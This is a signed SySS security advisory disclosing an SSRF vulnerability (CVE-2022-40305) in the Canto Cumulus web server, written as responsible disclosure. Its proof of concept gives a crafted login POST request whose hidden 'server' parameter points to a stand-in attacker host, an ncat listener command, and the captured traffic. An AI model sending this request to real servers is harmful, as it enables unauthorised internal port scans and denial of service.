-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: CVE-2022-40305 Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).[1] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter 'server' is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: * Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server's infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. * Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. * Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. * Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from [WAN IP]. Ncat: Connection from [WAN IP]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |...(reco........| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ....| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long..w{....| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco........cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability 2022-09-09: CVE-2022-40305 assigned ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ [2] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmMa5SQACgkQ6ceYZrZF fXreoQ//UxVF4wkbgxSV5Bq+5fyugMD+G91+c6J6FXVt11/kGr6oz9DQWIXpmvbN MOzy1nNM8Kfvr5JXWR13FcdiS7KVzmUPpG4PITr5y4W0nJTSlDslbA5XiFme7sb8 foKEoSckdo4kWJzJEOq1AtadkvJxRMPgkijHhnn5JdAmgbhOm53hJMOWVjyEA+cw IDMdCuL+XzJ+L7EfA6Eo/r8vFNRBWfG0+knnzUSFlizTWVoYsN/kCoMdHWkv7Fr8 QW9GfhoQ7m5jsXXxP1yKId7Uc2QvV+7aqtHObq9qBSHWVKS9R7kPhSg3xvqVNNnr 4bmFXG0TuUB3ycCoq6L2dipkYiNSWaXET7N+8fm8Tuxfl4PMuIN1u5GYe1iDhDBH yF5ci2uxYD5U+Xwn42byoER1CB6afx9jWs4iHtTcJfVTPXKe9w9o+xH1uEAbl0U9 JPOqWGxtN/SgFCKYwq3r82IV1/j79T6xdspngCX5nUpfIvypL6pN+eshBx8ocsPn uiSZgrYqgg3h1l+rUo2jbGUWKdJwZtq2xpyJ3f7D6yqdap5l+EWQgGvtHkq0tVQX T740Gg9VgM8WdpsLXpIw3Cz9KWv0C7WL9KZREDl7q67DrSsOp182IVDIz0x/dqNG aZl4oox7GgYrelMJmE/bgPyKvyeeT6rE3ppkztY1PEEwSoZI4V8= =Yzmg -----END PGP SIGNATURE-----